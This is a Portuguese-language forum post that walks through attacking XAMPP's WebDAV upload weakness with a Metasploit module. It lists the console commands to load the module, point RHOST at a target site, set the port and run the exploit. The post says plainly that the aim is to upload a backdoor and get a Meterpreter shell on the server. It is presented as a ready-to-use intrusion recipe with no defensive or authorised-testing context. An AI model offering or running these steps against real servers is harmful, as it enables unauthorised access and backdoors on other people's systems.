Ir para conteúdo
Entre para seguir isso  
FaceOs

EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT

Recommended Posts

FaceOs    25

EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT

Bem pessoal, hoje vou lhes apresentar um exploit muito bacana no XAMPP que inclusive possui um módulo no Metasploit.

Primeiramente, precisamos do Metasploit Framework no computador, certo? Ele possui tanto suas versões para Linux e Windows, através do site da Rapid7

Então, com o Metasploit instalado, vamos começar.

 

Se você estiver no Windows, vá até a pasta do Metasploit e digite:

msfconsole

Ou

console

 

Caso esteja no Linux, instale com o install.sh ou mova os scripts do MSF para o "/root/bin".

 

Pronto, quando o Metasploit carregar, digite:

use exploit/windows/http/xampp_webdav_upload_php

Após isso, irá carregar o módulo do exploit.

Agora a gente irá setar as funções: RHOST, RPORT e EXPLOIT.

No RHOST - A gente irá mencionar o nosso site/ip alvo.

No RPORT -  A gente irá setar a porta da conexão do alvo, pode ser 80, 8443, 8090,8033, 8080... Enfim.

E no EXPLOIT - Nós iremos rodar o exploit e conseguir o Meterpreter no servidor, ou seja, upar a backdoor e ganhar a shell.

 

Vamos lá então:

set RHOST www.target.com
set RPORT 80
exploit

 

Ilustrações:

1.PNG

2.PNG

3.PNG

4.PNG

  • Haha 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Entre para seguir isso  

×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.